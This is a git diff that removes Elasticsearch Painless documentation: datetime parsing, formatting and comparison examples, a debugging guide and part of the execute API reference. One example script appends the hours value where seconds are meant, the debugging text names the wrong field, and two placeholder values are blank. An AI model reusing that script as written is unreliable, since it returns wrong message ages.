- -include::painless-watcher-context-example.asciidoc[] diff --git a/docs/painless/painless-contexts/painless-weight-context.asciidoc b/docs/painless/painless-contexts/painless-weight-context.asciidoc deleted file mode 100644 index 9b4a47bc113..00000000000 --- a/docs/painless/painless-contexts/painless-weight-context.asciidoc +++ /dev/null @@ -1,42 +0,0 @@ -[[painless-weight-context]] -=== Weight context - -Use a Painless script to create a -{ref}/index-modules-similarity.html[weight] for use in a -<>. The weight makes up the -part of the similarity calculation that is independent of the document being -scored, and so can be built up front and cached. - -Queries that contain multiple terms calculate a separate weight for each term. - -*Variables* - -`query.boost` (`float`, read-only):: - The boost value if provided by the query. If this is not provided the - value is `1.0f`. - -`field.docCount` (`long`, read-only):: - The number of documents that have a value for the current field. - -`field.sumDocFreq` (`long`, read-only):: - The sum of all terms that exist for the current field. If this is not - available the value is `-1`. - -`field.sumTotalTermFreq` (`long`, read-only):: - The sum of occurrences in the index for all the terms that exist in the - current field. If this is not available the value is `-1`. - -`term.docFreq` (`long`, read-only):: - The number of documents that contain the current term in the index. - -`term.totalTermFreq` (`long`, read-only):: - The total occurrences of the current term in the index. - -*Return* - -`double`:: - A scoring factor used across all documents. - -*API* - -The standard <> is available. diff --git a/docs/painless/painless-guide.asciidoc b/docs/painless/painless-guide.asciidoc deleted file mode 100644 index 2d79445915c..00000000000 --- a/docs/painless/painless-guide.asciidoc +++ /dev/null @@ -1,29 +0,0 @@ -[[painless-guide]] -== Painless Guide - -_Painless_ is a simple, secure scripting language designed specifically for use -with Elasticsearch. It is the default scripting language for Elasticsearch and -can safely be used for inline and stored scripts. For a jump start into -Painless, see <>. For a -detailed description of the Painless syntax and language features, see the -<>. - -You can use Painless anywhere scripts are used in Elasticsearch. Painless -provides: - -* Fast performance: Painless scripts https://benchmarks.elastic.co/index.html#search_qps_scripts[ -run several times faster] than the alternatives. - -* Safety: Fine-grained allowlist with method call/field granularity. See the -{painless}/painless-api-reference.html[Painless API Reference] for a -complete list of available classes and methods. - -* Optional typing: Variables and parameters can use explicit types or the -dynamic `def` type. - -* Syntax: Extends a subset of Java's syntax to provide additional scripting -language features. - -* Optimizations: Designed specifically for Elasticsearch scripting. 
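As a small illustration of the optional typing mentioned in the list above, the same loop can be written with an explicit type or with the dynamic `def` type. This is only a sketch and is not part of the original guide:

[source,Painless]
----
int explicitTotal = 0;          // explicitly typed accumulator
for (int i = 0; i < 5; ++i) {
  explicitTotal += i;
}

def dynamicTotal = 0;           // dynamically typed accumulator using `def`
for (def j = 0; j < 5; ++j) {
  dynamicTotal += j;
}
----

Both variables end up holding the value `10`; the `def` version simply defers type resolution to runtime.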
- -include::painless-guide/index.asciidoc[] \ No newline at end of file diff --git a/docs/painless/painless-guide/index.asciidoc b/docs/painless/painless-guide/index.asciidoc deleted file mode 100644 index f7e5de693df..00000000000 --- a/docs/painless/painless-guide/index.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -include::painless-walkthrough.asciidoc[] - -include::painless-datetime.asciidoc[] - -include::painless-method-dispatch.asciidoc[] - -include::painless-debugging.asciidoc[] - -include::painless-execute-script.asciidoc[] - -include::../redirects.asciidoc[] diff --git a/docs/painless/painless-guide/painless-datetime.asciidoc b/docs/painless/painless-guide/painless-datetime.asciidoc deleted file mode 100644 index 8244ecb9cfd..00000000000 --- a/docs/painless/painless-guide/painless-datetime.asciidoc +++ /dev/null @@ -1,898 +0,0 @@ -[[painless-datetime]] -=== Using Datetime in Painless - -==== Datetime API - -Datetimes in Painless use the standard Java libraries and are available through -the Painless <>. Most of the classes -from the following Java packages are available to use in Painless scripts: - -* <> -* <> -* <> -* <> -* <> - -==== Datetime Representation - -Datetimes in Painless are most commonly represented as a numeric value, a -string value, or a complex value. - -numeric:: a datetime representation as a number from a starting offset called -an epoch; in Painless this is typically a <> as -milliseconds since an epoch of 1970-01-01 00:00:00 Zulu Time -string:: a datetime representation as a sequence of characters defined by -a standard format or a custom format; in Painless this is typically a -<> of the standard format -{wikipedia}/ISO_8601[ISO 8601] -complex:: a datetime representation as a complex type -(<>) that abstracts away internal details of how the -datetime is stored and often provides utilities for modification and -comparison; in Painless this is typically a -<> - -Switching between different representations of datetimes is often necessary to -achieve a script's objective(s). A typical pattern in a script is to switch a -numeric or string datetime to a complex datetime, modify or compare the complex -datetime, and then switch it back to a numeric or string datetime for storage -or to return a result. - -==== Datetime Parsing and Formatting - -Datetime parsing is a switch from a string datetime to a complex datetime, and -datetime formatting is a switch from a complex datetime to a string datetime. - -A <> is a -complex type (<>) that defines the allowed sequence -of characters for a string datetime. Datetime parsing and formatting often -require a DateTimeFormatter. For more information about how to use a -DateTimeFormatter see the -{java11-javadoc}/java.base/java/time/format/DateTimeFormatter.html[Java documentation]. - -===== Datetime Parsing Examples - -* parse from milliseconds -+ -[source,Painless] ----- -String milliSinceEpochString = "434931330000"; -long milliSinceEpoch = Long.parseLong(milliSinceEpochString); -Instant instant = Instant.ofEpochMilli(milliSinceEpoch); -ZonedDateTime zdt = ZonedDateTime.ofInstant(instant, ZoneId.of('Z')); ----- -+ -* parse from ISO 8601 -+ -[source,Painless] ----- -String datetime = '1983-10-13T22:15:30Z'; -ZonedDateTime zdt = ZonedDateTime.parse(datetime); <1> ----- -<1> Note the parse method uses ISO 8601 by default. 
-+ -* parse from RFC 1123 -+ -[source,Painless] ----- -String datetime = 'Thu, 13 Oct 1983 22:15:30 GMT'; -ZonedDateTime zdt = ZonedDateTime.parse(datetime, - DateTimeFormatter.RFC_1123_DATE_TIME); <1> ----- -<1> Note the use of a built-in DateTimeFormatter. -+ -* parse from a custom format -+ -[source,Painless] ----- -String datetime = 'custom y 1983 m 10 d 13 22:15:30 Z'; -DateTimeFormatter dtf = DateTimeFormatter.ofPattern( - "'custom' 'y' yyyy 'm' MM 'd' dd HH:mm:ss VV"); -ZonedDateTime zdt = ZonedDateTime.parse(datetime, dtf); <1> ----- -<1> Note the use of a custom DateTimeFormatter. - -===== Datetime Formatting Examples - -* format to ISO 8601 -+ -[source,Painless] ----- -ZonedDateTime zdt = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 0, ZoneId.of('Z')); -String datetime = zdt.format(DateTimeFormatter.ISO_INSTANT); <1> ----- -<1> Note the use of a built-in DateTimeFormatter. -+ -* format to a custom format -+ -[source,Painless] ----- -ZonedDateTime zdt = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 0, ZoneId.of('Z')); -DateTimeFormatter dtf = DateTimeFormatter.ofPattern( - "'date:' yyyy/MM/dd 'time:' HH:mm:ss"); -String datetime = zdt.format(dtf); <1> ----- -<1> Note the use of a custom DateTimeFormatter. - -==== Datetime Conversion - -Datetime conversion is a switch from a numeric datetime to a complex datetime -and vice versa. - -===== Datetime Conversion Examples - -* convert from milliseconds -+ -[source,Painless] ----- -long milliSinceEpoch = 434931330000L; -Instant instant = Instant.ofEpochMilli(milliSinceEpoch); -ZonedDateTime zdt = ZonedDateTime.ofInstant(instant, ZoneId.of('Z')); ----- -+ -* convert to milliseconds -+ -[source,Painless] ------ -ZonedDateTime zdt = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 0, ZoneId.of('Z')); -long milliSinceEpoch = zdt.toInstant().toEpochMilli(); ------ - -==== Datetime Pieces - -Datetime representations often contain the data to extract individual datetime -pieces such as year, hour, timezone, etc. Use individual pieces of a datetime -to create a complex datetime, and use a complex datetime to extract individual -pieces. - -===== Datetime Pieces Examples - -* create a complex datetime from pieces -+ -[source,Painless] ----- -int year = 1983; -int month = 10; -int day = 13; -int hour = 22; -int minutes = 15; -int seconds = 30; -int nanos = 0; -ZonedDateTime zdt = ZonedDateTime.of( - year, month, day, hour, minutes, seconds, nanos, ZoneId.of('Z')); ----- -+ -* extract pieces from a complex datetime -+ -[source,Painless] ----- -ZonedDateTime zdt = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 100, ZoneId.of(tz)); -int year = zdt.getYear(); -int month = zdt.getMonthValue(); -int day = zdt.getDayOfMonth(); -int hour = zdt.getHour(); -int minutes = zdt.getMinute(); -int seconds = zdt.getSecond(); -int nanos = zdt.getNano(); ----- - -==== Datetime Modification - -Use either a numeric datetime or a complex datetime to do modification such as -adding several seconds to a datetime or subtracting several days from a -datetime. Use standard <> to -modify a numeric datetime. Use -<> (or fields) to modify -a complex datetime. Note many complex datetimes are immutable so upon -modification a new complex datetime is created that requires -<> or immediate use. 
- -===== Datetime Modification Examples - -* Subtract three seconds from a numeric datetime in milliseconds -+ -[source,Painless] ----- -long milliSinceEpoch = 434931330000L; -milliSinceEpoch = milliSinceEpoch - 1000L*3L; ----- -+ -* Add three days to a complex datetime -+ -[source,Painless] ----- -ZonedDateTime zdt = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 0, ZoneId.of('Z')); -ZonedDateTime updatedZdt = zdt.plusDays(3); ----- -+ -* Subtract 125 minutes from a complex datetime -+ -[source,Painless] ----- -ZonedDateTime zdt = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 0, ZoneId.of('Z')); -ZonedDateTime updatedZdt = zdt.minusMinutes(125); ----- -+ -* Set the year on a complex datetime -+ -[source,Painless] ----- -ZonedDateTime zdt = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 0, ZoneId.of('Z')); -ZonedDateTime updatedZdt = zdt.withYear(1976); ----- - -==== Datetime Difference (Elapsed Time) - -Use either two numeric datetimes or two complex datetimes to calculate the -difference (elapsed time) between two different datetimes. Use -<> to calculate the difference between two -numeric datetimes of the same time unit such as milliseconds. For -complex datetimes there is often a method or another complex type -(<>) available to calculate the difference. Use -<> -to calculate the difference between two complex datetimes if supported. - -===== Datetime Difference Examples - -* Difference in milliseconds between two numeric datetimes -+ -[source,Painless] ----- -long startTimestamp = 434931327000L; -long endTimestamp = 434931330000L; -long differenceInMillis = endTimestamp - startTimestamp; ----- -+ -* Difference in milliseconds between two complex datetimes -+ -[source,Painless] ----- -ZonedDateTime zdt1 = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 11000000, ZoneId.of('Z')); -ZonedDateTime zdt2 = - ZonedDateTime.of(1983, 10, 13, 22, 15, 35, 0, ZoneId.of('Z')); -long differenceInMillis = ChronoUnit.MILLIS.between(zdt1, zdt2); ----- -+ -* Difference in days between two complex datetimes -+ -[source,Painless] ----- -ZonedDateTime zdt1 = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 11000000, ZoneId.of('Z')); -ZonedDateTime zdt2 = - ZonedDateTime.of(1983, 10, 17, 22, 15, 35, 0, ZoneId.of('Z')); -long differenceInDays = ChronoUnit.DAYS.between(zdt1, zdt2); ----- - -==== Datetime Comparison - -Use either two numeric datetimes or two complex datetimes to do a datetime -comparison. Use standard <> -to compare two numeric datetimes of the same time unit such as milliseconds. -For complex datetimes there is often a method or another complex type -(<>) available to do the comparison. 
- -===== Datetime Comparison Examples - -* Greater than comparison of two numeric datetimes in milliseconds -+ -[source,Painless] ----- -long timestamp1 = 434931327000L; -long timestamp2 = 434931330000L; - -if (timestamp1 > timestamp2) { - // handle condition -} ----- -+ -* Equality comparison of two complex datetimes -+ -[source,Painless] ----- -ZonedDateTime zdt1 = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 0, ZoneId.of('Z')); -ZonedDateTime zdt2 = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 0, ZoneId.of('Z')); - -if (zdt1.equals(zdt2)) { - // handle condition -} ----- -+ -* Less than comparison of two complex datetimes -+ -[source,Painless] ----- -ZonedDateTime zdt1 = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 0, ZoneId.of('Z')); -ZonedDateTime zdt2 = - ZonedDateTime.of(1983, 10, 17, 22, 15, 35, 0, ZoneId.of('Z')); - -if (zdt1.isBefore(zdt2)) { - // handle condition -} ----- -+ -* Greater than comparison of two complex datetimes -+ -[source,Painless] ----- -ZonedDateTime zdt1 = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 0, ZoneId.of('Z')); -ZonedDateTime zdt2 = - ZonedDateTime.of(1983, 10, 17, 22, 15, 35, 0, ZoneId.of('Z')); - -if (zdt1.isAfter(zdt2)) { - // handle condition -} ----- - -==== Datetime Zone - -Both string datetimes and complex datetimes have a timezone with a default of -`UTC`. Numeric datetimes do not have enough explicit information to -have a timezone, so `UTC` is always assumed. Use -<> (or fields) in -conjunction with a <> to change -the timezone for a complex datetime. Parse a string datetime into a complex -datetime to change the timezone, and then format the complex datetime back into -a desired string datetime. Note many complex datetimes are immutable so upon -modification a new complex datetime is created that requires -<> or immediate use. - -===== Datetime Zone Examples - -* Modify the timezone for a complex datetime -+ -[source,Painless] ----- -ZonedDateTime utc = - ZonedDateTime.of(1983, 10, 13, 22, 15, 30, 0, ZoneId.of('Z')); -ZonedDateTime pst = utc.withZoneSameInstant(ZoneId.of('America/Los_Angeles')); ----- -+ -* Modify the timezone for a string datetime -+ -[source,Painless] ----- -String gmtString = 'Thu, 13 Oct 1983 22:15:30 GMT'; -ZonedDateTime gmtZdt = ZonedDateTime.parse(gmtString, - DateTimeFormatter.RFC_1123_DATE_TIME); <1> -ZonedDateTime pstZdt = - gmtZdt.withZoneSameInstant(ZoneId.of('America/Los_Angeles')); -String pstString = pstZdt.format(DateTimeFormatter.RFC_1123_DATE_TIME); ----- -<1> Note the use of a built-in DateTimeFormatter. - -==== Datetime Input - -There are several common ways datetimes are used as input for a script -determined by the <>. Typically, datetime -input will be accessed from parameters specified by the user, from an original -source document, or from an indexed document. - -===== Datetime Input From User Parameters - -Use the {ref}/modules-scripting-using.html#_script_parameters[params section] -during script specification to pass in a numeric datetime or string datetime as -a script input. Access to user-defined parameters within a script is dependent -on the Painless context, though, the parameters are most commonly accessible -through an input called `params`. - -*Examples* - -* Parse a numeric datetime from user parameters to a complex datetime -+ -** Input: -+ -[source,JSON] ----- -... -"script": { - ... - "params": { - "input_datetime": 434931327000 - } -} -... 
----- -+ -** Script: -+ -[source,Painless] ----- -long inputDateTime = params['input_datetime']; -Instant instant = Instant.ofEpochMilli(inputDateTime); -ZonedDateTime zdt = ZonedDateTime.ofInstant(instant, ZoneId.of('Z')); ----- -+ -* Parse a string datetime from user parameters to a complex datetime -+ -** Input: -+ -[source,JSON] ----- -... -"script": { - ... - "params": { - "input_datetime": "custom y 1983 m 10 d 13 22:15:30 Z" - } -} -... ----- -+ -** Script: -+ -[source,Painless] ----- -String datetime = params['input_datetime']; -DateTimeFormatter dtf = DateTimeFormatter.ofPattern( - "'custom' 'y' yyyy 'm' MM 'd' dd HH:mm:ss VV"); -ZonedDateTime zdt = ZonedDateTime.parse(datetime, dtf); <1> ----- -<1> Note the use of a custom DateTimeFormatter. - -===== Datetime Input From a Source Document - -Use an original {ref}/mapping-source-field.html[source] document as a script -input to access a numeric datetime or string datetime for a specific field -within that document. Access to an original source document within a script is -dependent on the Painless context and is not always available. An original -source document is most commonly accessible through an input called -`ctx['_source']` or `params['_source']`. - -*Examples* - -* Parse a numeric datetime from a sourced document to a complex datetime -+ -** Input: -+ -[source,JSON] ----- -{ - ... - "input_datetime": 434931327000 - ... -} ----- -+ -** Script: -+ -[source,Painless] ----- -long inputDateTime = ctx['_source']['input_datetime']; <1> -Instant instant = Instant.ofEpochMilli(inputDateTime); -ZonedDateTime zdt = ZonedDateTime.ofInstant(instant, ZoneId.of('Z')); ----- -<1> Note access to `_source` is dependent on the Painless context. -+ -* Parse a string datetime from a sourced document to a complex datetime -+ -** Input: -+ -[source,JSON] ----- -{ - ... - "input_datetime": "1983-10-13T22:15:30Z" - ... -} ----- -+ -** Script: -+ -[source,Painless] ----- -String datetime = params['_source']['input_datetime']; <1> -ZonedDateTime zdt = ZonedDateTime.parse(datetime); <2> ----- -<1> Note access to `_source` is dependent on the Painless context. -<2> Note the parse method uses ISO 8601 by default. - -===== Datetime Input From an Indexed Document - -Use an indexed document as a script input to access a complex datetime for a -specific field within that document where the field is mapped as a -{ref}/date.html[standard date] or a {ref}/date_nanos.html[nanosecond date]. -Numeric datetime fields mapped as {ref}/number.html[numeric] and string -datetime fields mapped as {ref}/keyword.html[keyword] are accessible through an -indexed document as well. Access to an indexed document within a script is -dependent on the Painless context and is not always available. An indexed -document is most commonly accessible through an input called `doc`. - -*Examples* - -* Format a complex datetime from an indexed document to a string datetime -+ -** Assumptions: -+ -*** The field `input_datetime` exists in all indexes as part of the query -*** All indexed documents contain the field `input_datetime` -+ -** Mappings: -+ -[source,JSON] ----- -{ - "mappings": { - ... - "properties": { - ... - "input_datetime": { - "type": "date" - } - ... - } - ... - } -} ----- -+ -** Script: -+ -[source,Painless] ----- -ZonedDateTime input = doc['input_datetime'].value; -String output = input.format(DateTimeFormatter.ISO_INSTANT); <1> ----- -<1> Note the use of a built-in DateTimeFormatter. 
-+
-* Find the difference between two complex datetimes from an indexed document
-+
-** Assumptions:
-+
-*** The fields `start` and `end` may *not* exist in all indexes as part of the
-query
-*** The fields `start` and `end` may *not* have values in all indexed documents
-+
-** Mappings:
-+
-[source,JSON]
-----
-{
-  "mappings": {
-    ...
-    "properties": {
-      ...
-      "start": {
-        "type": "date"
-      },
-      "end": {
-        "type": "date"
-      }
-      ...
-    }
-    ...
-  }
-}
-----
-+
-** Script:
-+
-[source,Painless]
-----
-if (doc.containsKey('start') && doc.containsKey('end')) { <1>
-
-    if (doc['start'].size() > 0 && doc['end'].size() > 0) { <2>
-
-        ZonedDateTime start = doc['start'].value;
-        ZonedDateTime end = doc['end'].value;
-        long differenceInMillis = ChronoUnit.MILLIS.between(start, end);
-
-        // handle difference in times
-    } else {
-        // handle fields without values
-    }
-} else {
-    // handle index with missing fields
-}
-----
-<1> When a query's results span multiple indexes, some indexes may not
-contain a specific field. Use the `containsKey` method call on the `doc` input
-to ensure a field exists as part of the index for the current document.
-<2> Some fields within a document may have no values. Use the `size` method
-call on a field within the `doc` input to ensure that field has at least one
-value for the current document.
-
-==== Datetime Now
-
-Under most Painless contexts the current datetime, `now`, is not supported.
-There are two primary reasons for this. The first is that scripts are often run once
-per document, so each time the script is run a different `now` is returned. The
-second is that scripts are often run in a distributed fashion without a way to
-appropriately synchronize `now`. Instead, pass in a user-defined parameter with
-either a string datetime or numeric datetime for `now`. A numeric datetime is
-preferred as there is no need to parse it for comparison.
-
-===== Datetime Now Examples
-
-* Use a numeric datetime as `now`
-+
-** Assumptions:
-+
-*** The field `input_datetime` exists in all indexes as part of the query
-*** All indexed documents contain the field `input_datetime`
-+
-** Mappings:
-+
-[source,JSON]
-----
-{
-  "mappings": {
-    ...
-    "properties": {
-      ...
-      "input_datetime": {
-        "type": "date"
-      }
-      ...
-    }
-    ...
-  }
-}
-----
-+
-** Input:
-+
-[source,JSON]
-----
-...
-"script": {
-  ...
-  "params": {
-    "now":
-  }
-}
-...
-----
-+
-** Script:
-+
-[source,Painless]
-----
-long now = params['now'];
-ZonedDateTime inputDateTime = doc['input_datetime'].value;
-long millisDateTime = inputDateTime.toInstant().toEpochMilli();
-long elapsedTime = now - millisDateTime;
-----
-+
-* Use a string datetime as `now`
-+
-** Assumptions:
-+
-*** The field `input_datetime` exists in all indexes as part of the query
-*** All indexed documents contain the field `input_datetime`
-+
-** Mappings:
-+
-[source,JSON]
-----
-{
-  "mappings": {
-    ...
-    "properties": {
-      ...
-      "input_datetime": {
-        "type": "date"
-      }
-      ...
-    }
-    ...
-  }
-}
-----
-+
-** Input:
-+
-[source,JSON]
-----
-...
-"script": {
-  ...
-  "params": {
-    "now": ""
-  }
-}
-...
-----
-+
-** Script:
-+
-[source,Painless]
-----
-String nowString = params['now'];
-ZonedDateTime nowZdt = ZonedDateTime.parse(nowString); <1>
-long now = nowZdt.toInstant().toEpochMilli();
-ZonedDateTime inputDateTime = doc['input_datetime'].value;
-long millisDateTime = inputDateTime.toInstant().toEpochMilli();
-long elapsedTime = now - millisDateTime;
-----
-<1> Note this parses the same string datetime every time the script runs.
Use a -numeric datetime to avoid a significant performance hit. - -==== Datetime Examples in Contexts - -===== Load the Example Data - -Run the following curl commands to load the data necessary for the context -examples into an Elasticsearch cluster: - -. Create {ref}/mapping.html[mappings] for the sample data. -+ -[source,console] ----- -PUT /messages -{ - "mappings": { - "properties": { - "priority": { - "type": "integer" - }, - "datetime": { - "type": "date" - }, - "message": { - "type": "text" - } - } - } -} ----- -+ -. Load the sample data. -+ -[source,console] ----- -POST /_bulk -{ "index" : { "_index" : "messages", "_id" : "1" } } -{ "priority": 1, "datetime": "2019-07-17T12:13:14Z", "message": "m1" } -{ "index" : { "_index" : "messages", "_id" : "2" } } -{ "priority": 1, "datetime": "2019-07-24T01:14:59Z", "message": "m2" } -{ "index" : { "_index" : "messages", "_id" : "3" } } -{ "priority": 2, "datetime": "1983-10-14T00:36:42Z", "message": "m3" } -{ "index" : { "_index" : "messages", "_id" : "4" } } -{ "priority": 3, "datetime": "1983-10-10T02:15:15Z", "message": "m4" } -{ "index" : { "_index" : "messages", "_id" : "5" } } -{ "priority": 3, "datetime": "1983-10-10T17:18:19Z", "message": "m5" } -{ "index" : { "_index" : "messages", "_id" : "6" } } -{ "priority": 1, "datetime": "2019-08-03T17:19:31Z", "message": "m6" } -{ "index" : { "_index" : "messages", "_id" : "7" } } -{ "priority": 3, "datetime": "2019-08-04T17:20:00Z", "message": "m7" } -{ "index" : { "_index" : "messages", "_id" : "8" } } -{ "priority": 2, "datetime": "2019-08-04T18:01:01Z", "message": "m8" } -{ "index" : { "_index" : "messages", "_id" : "9" } } -{ "priority": 3, "datetime": "1983-10-10T19:00:45Z", "message": "m9" } -{ "index" : { "_index" : "messages", "_id" : "10" } } -{ "priority": 2, "datetime": "2019-07-23T23:39:54Z", "message": "m10" } ----- -// TEST[continued] - -===== Day-of-the-Week Bucket Aggregation Example - -The following example uses a -{ref}/search-aggregations-bucket-terms-aggregation.html#search-aggregations-bucket-terms-aggregation-script[terms aggregation] -as part of the -<> to -display the number of messages from each day-of-the-week. - -[source,console] ----- -GET /messages/_search?pretty=true -{ - "aggs": { - "day-of-week-count": { - "terms": { - "script": "return doc[\"datetime\"].value.getDayOfWeekEnum();" - } - } - } -} ----- -// TEST[continued] - -===== Morning/Evening Bucket Aggregation Example - -The following example uses a -{ref}/search-aggregations-bucket-terms-aggregation.html#search-aggregations-bucket-terms-aggregation-script[terms aggregation] -as part of the -<> to -display the number of messages received in the morning versus the evening. - -[source,console] ----- -GET /messages/_search?pretty=true -{ - "aggs": { - "am-pm-count": { - "terms": { - "script": "return doc[\"datetime\"].value.getHour() < 12 ? \"AM\" : \"PM\";" - } - } - } -} ----- -// TEST[continued] - -===== Age of a Message Script Field Example - -The following example uses a -{ref}/search-fields.html#script-fields[script field] as part of the -<> to display the elapsed time between -"now" and when a message was received. 
- -[source,console] ----- -GET /_search?pretty=true -{ - "query": { - "match_all": {} - }, - "script_fields": { - "message_age": { - "script": { - "source": "ZonedDateTime now = ZonedDateTime.ofInstant(Instant.ofEpochMilli(params[\"now\"]), ZoneId.of(\"Z\")); ZonedDateTime mdt = doc[\"datetime\"].value; String age; long years = mdt.until(now, ChronoUnit.YEARS); age = years + \"Y \"; mdt = mdt.plusYears(years); long months = mdt.until(now, ChronoUnit.MONTHS); age += months + \"M \"; mdt = mdt.plusMonths(months); long days = mdt.until(now, ChronoUnit.DAYS); age += days + \"D \"; mdt = mdt.plusDays(days); long hours = mdt.until(now, ChronoUnit.HOURS); age += hours + \"h \"; mdt = mdt.plusHours(hours); long minutes = mdt.until(now, ChronoUnit.MINUTES); age += minutes + \"m \"; mdt = mdt.plusMinutes(minutes); long seconds = mdt.until(now, ChronoUnit.SECONDS); age += hours + \"s\"; return age;", - "params": { - "now": 1574005645830 - } - } - } - } -} ----- -// TEST[continued] - -The following shows the script broken into multiple lines: - -[source,Painless] ----- -ZonedDateTime now = ZonedDateTime.ofInstant( - Instant.ofEpochMilli(params['now']), ZoneId.of('Z')); <1> -ZonedDateTime mdt = doc['datetime'].value; <2> - -String age; - -long years = mdt.until(now, ChronoUnit.YEARS); <3> -age = years + 'Y '; <4> -mdt = mdt.plusYears(years); <5> - -long months = mdt.until(now, ChronoUnit.MONTHS); -age += months + 'M '; -mdt = mdt.plusMonths(months); - -long days = mdt.until(now, ChronoUnit.DAYS); -age += days + 'D '; -mdt = mdt.plusDays(days); - -long hours = mdt.until(now, ChronoUnit.HOURS); -age += hours + 'h '; -mdt = mdt.plusHours(hours); - -long minutes = mdt.until(now, ChronoUnit.MINUTES); -age += minutes + 'm '; -mdt = mdt.plusMinutes(minutes); - -long seconds = mdt.until(now, ChronoUnit.SECONDS); -age += hours + 's'; - -return age; <6> ----- -<1> Parse the datetime "now" as input from the user-defined params. -<2> Store the datetime the message was received as a `ZonedDateTime`. -<3> Find the difference in years between "now" and the datetime the message was -received. -<4> Add the difference in years later returned in the format -`Y ...` for the age of a message. -<5> Add the years so only the remainder of the months, days, etc. remain as the -difference between "now" and the datetime the message was received. Repeat this -pattern until the desired granularity is reached (seconds in this example). -<6> Return the age of the message in the format -`Y M D h m s `. diff --git a/docs/painless/painless-guide/painless-debugging.asciidoc b/docs/painless/painless-guide/painless-debugging.asciidoc deleted file mode 100644 index afd83705964..00000000000 --- a/docs/painless/painless-guide/painless-debugging.asciidoc +++ /dev/null @@ -1,92 +0,0 @@ -[[painless-debugging]] -=== Painless Debugging - -==== Debug.Explain - -Painless doesn't have a -{wikipedia}/Read%E2%80%93eval%E2%80%93print_loop[REPL] -and while it'd be nice for it to have one day, it wouldn't tell you the -whole story around debugging painless scripts embedded in Elasticsearch because -the data that the scripts have access to or "context" is so important. For now -the best way to debug embedded scripts is by throwing exceptions at choice -places. While you can throw your own exceptions -(`throw new Exception('whatever')`), Painless's sandbox prevents you from -accessing useful information like the type of an object. So Painless has a -utility method, `Debug.explain` which throws the exception for you. 
For -example, you can use {ref}/search-explain.html[`_explain`] to explore the -context available to a {ref}/query-dsl-script-query.html[script query]. - -[source,console] ---------------------------------------------------------- -PUT /hockey/_doc/1?refresh -{"first":"johnny","last":"gaudreau","goals":[9,27,1],"assists":[17,46,0],"gp":[26,82,1]} - -POST /hockey/_explain/1 -{ - "query": { - "script": { - "script": "Debug.explain(doc.goals)" - } - } -} ---------------------------------------------------------- -// TEST[s/_explain\/1/_explain\/1?error_trace=false/ catch:/painless_explain_error/] -// The test system sends error_trace=true by default for easier debugging so -// we have to override it to get a normal shaped response - -Which shows that the class of `doc.first` is -`org.elasticsearch.index.fielddata.ScriptDocValues.Longs` by responding with: - -[source,console-result] ---------------------------------------------------------- -{ - "error": { - "type": "script_exception", - "to_string": "[1, 9, 27]", - "painless_class": "org.elasticsearch.index.fielddata.ScriptDocValues.Longs", - "java_class": "org.elasticsearch.index.fielddata.ScriptDocValues$Longs", - ... - }, - "status": 400 -} ---------------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"script_stack": $body.error.script_stack, "script": $body.error.script, "lang": $body.error.lang, "position": $body.error.position, "caused_by": $body.error.caused_by, "root_cause": $body.error.root_cause, "reason": $body.error.reason/] - -You can use the same trick to see that `_source` is a `LinkedHashMap` -in the `_update` API: - -[source,console] ---------------------------------------------------------- -POST /hockey/_update/1 -{ - "script": "Debug.explain(ctx._source)" -} ---------------------------------------------------------- -// TEST[continued s/_update\/1/_update\/1?error_trace=false/ catch:/painless_explain_error/] - -The response looks like: - -[source,console-result] ---------------------------------------------------------- -{ - "error" : { - "root_cause": ..., - "type": "illegal_argument_exception", - "reason": "failed to execute script", - "caused_by": { - "type": "script_exception", - "to_string": "{gp=[26, 82, 1], last=gaudreau, assists=[17, 46, 0], first=johnny, goals=[9, 27, 1]}", - "painless_class": "java.util.LinkedHashMap", - "java_class": "java.util.LinkedHashMap", - ... - } - }, - "status": 400 -} ---------------------------------------------------------- -// TESTRESPONSE[s/"root_cause": \.\.\./"root_cause": $body.error.root_cause/] -// TESTRESPONSE[s/\.\.\./"script_stack": $body.error.caused_by.script_stack, "script": $body.error.caused_by.script, "lang": $body.error.caused_by.lang, "position": $body.error.caused_by.position, "caused_by": $body.error.caused_by.caused_by, "reason": $body.error.caused_by.reason/] -// TESTRESPONSE[s/"to_string": ".+"/"to_string": $body.error.caused_by.to_string/] - -Once you have a class you can go to <> to see a list of -available methods. 
diff --git a/docs/painless/painless-guide/painless-execute-script.asciidoc b/docs/painless/painless-guide/painless-execute-script.asciidoc deleted file mode 100644 index 6c61d5f6011..00000000000 --- a/docs/painless/painless-guide/painless-execute-script.asciidoc +++ /dev/null @@ -1,166 +0,0 @@ -[[painless-execute-api]] -=== Painless execute API - -experimental[The painless execute api is new and the request / response format may change in a breaking way in the future] - -The Painless execute API allows an arbitrary script to be executed and a result to be returned. - -[[painless-execute-api-parameters]] -.Parameters -[options="header"] -|====== -| Name | Required | Default | Description -| `script` | yes | - | The script to execute. -| `context` | no | `painless_test` | The context the script should be executed in. -| `context_setup` | no | - | Additional parameters to the context. -|====== - -==== Contexts - -Contexts control how scripts are executed, what variables are available at runtime and what the return type is. - -===== Painless test context - -The `painless_test` context executes scripts as is and does not add any special parameters. -The only variable that is available is `params`, which can be used to access user defined values. -The result of the script is always converted to a string. -If no context is specified then this context is used by default. - -*Example* - -Request: - -[source,console] ----------------------------------------------------------------- -POST /_scripts/painless/_execute -{ - "script": { - "source": "params.count / params.total", - "params": { - "count": 100.0, - "total": 1000.0 - } - } -} ----------------------------------------------------------------- - -Response: - -[source,console-result] --------------------------------------------------- -{ - "result": "0.1" -} --------------------------------------------------- - -===== Filter context - -The `filter` context executes scripts as if they were executed inside a `script` query. -For testing purposes, a document must be provided so that it will be temporarily indexed in-memory and -is accessible from the script. More precisely, the _source, stored fields and doc values of such a -document are available to the script being tested. - -The following parameters may be specified in `context_setup` for a filter context: - -document:: Contains the document that will be temporarily indexed in-memory and is 